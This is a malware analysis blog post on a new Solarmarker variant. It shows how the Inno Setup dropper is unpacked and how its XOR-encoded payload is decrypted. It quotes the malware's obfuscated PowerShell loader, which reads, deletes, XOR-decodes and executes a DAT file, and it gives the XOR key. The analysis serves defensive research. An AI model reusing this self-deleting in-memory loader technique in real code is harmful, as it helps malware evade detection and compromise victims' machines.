New Solarmarker Variant October 2023

OnSquiblydoo came across a new variant of solarmarker malware and posted the finidings here:
https://twitter.com/SquiblydooBlog/status/1717464614403735562
Unfortunately this new version no longer works with my extractor tool found here: https://github.com/securitymagic/tools/blob/main/extractsmdll.py

However, RussianPanda posted a new tool which can be used after the Inno Package is extracted.

A quick analysis suggests that the new dropper uses Inno Setup, some quick tools can pull some of the data, including a few of the powershell commands seen below.
innounp -x -m .\Appendix-C-Acceptance-of-Acknowledgement-of-Policies-and.exe
strings .\CompiledCode.bin

WIN-VUA6POUV5UP
0CC47AC83803
JOHN-PC
FkLmng
TNewEdit
Cancel
{tmp}
.pdf
{tmp}\budget_fy2024.pdf
\..\
\budget_fy2024.pdf
open
{tmp}\data.dat
pSDubTWyjzdAhmBNLtROxasMKfJUPQVv
iex([Text.Encoding]::UTF8.GetString((({$F=[IO.File]::ReadAllBytes($args[0]);(rm $args[0]);return $F}.invoke('
'))|%{$_ -bxor '
'[$K++%32]})))
-command "
powershell


cat .\install_script.iss
;InnoSetupVersion=6.1.0 (Unicode)

[Setup]
AppName=ATech
AppVerName=ATech
AppId=ATech
AppVersion=3.1.0.2
DefaultDirName={tmp}\ATSoftware
OutputBaseFilename=Appendix-C-Acceptance-of-Acknowledgement-of-Policies-and
Compression=lzma2
PrivilegesRequired=lowest
DisableDirPage=auto
DisableProgramGroupPage=auto
WizardImageFile=embedded\WizardImage0.bmp,embedded\WizardImage1.bmp
WizardSmallImageFile=embedded\WizardSmallImage0.bmp,embedded\WizardSmallImage1.bmp


Upon Running the malware, we can see the initial powershell command references a DAT file which is XOR encoded. THe following screenshot shows loading the DAT file and applying the XOR key in CyberChef. The issue with the above method, is that you have to sort of be quick about it, since the DAT file appears to be deleted after a short time.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -cOmmAnD "iex([teXt.ENCOdING]::UTF8.gETstriNg((({$f=[IO.FILe]::REaDALLBytES($ArgS[0]); (rM $aRGs[0]);REtuRN $F}.iNVoKE('C:\uSerS\user\APpdAta\locaL\TeMp\IS-a5FP9.tMp\..\4641CBAc3D3FB07D6Af991E171087D4a.DAt'))|%{$_ -bXoR 'pSDubTWyjzdAhmBNLtROxasMKfJUPQVv'[$K++%32]})))"




Once decoded in CyberChef, the next powershell part which loads the malicious DLL in memory is the same familiar code we've been seeing. This code can be manipulated to extract the DLL payload as seen in the screenshots.


Once the modified code above is run, it extracts the DLL https://www.virustotal.com/gui/file/79611ccdebf0fdafcf6844ea278314038ceda7b6f5c39ed7919cf6f7f2274c06/detection
Using tool From RussianPanda
Extract the Inno Package, read in the contents of the CompiledCode.bin to find the XOR key, then run the tool against the extracted data.dat file.
python decrypt_new_solarmarker_10-30-2023.py
Enter the path of the encrypted file: data.dat
Enter the XOR key: pSDubTWyjzdAhmBNLtROxasMKfJUPQVv
Enter the name of the output file to save the decrypted binary: evil.dll
Decrypted binary saved to: evil.dll


This negates the need to try and grab the TEMP file before it's deleted.

Comments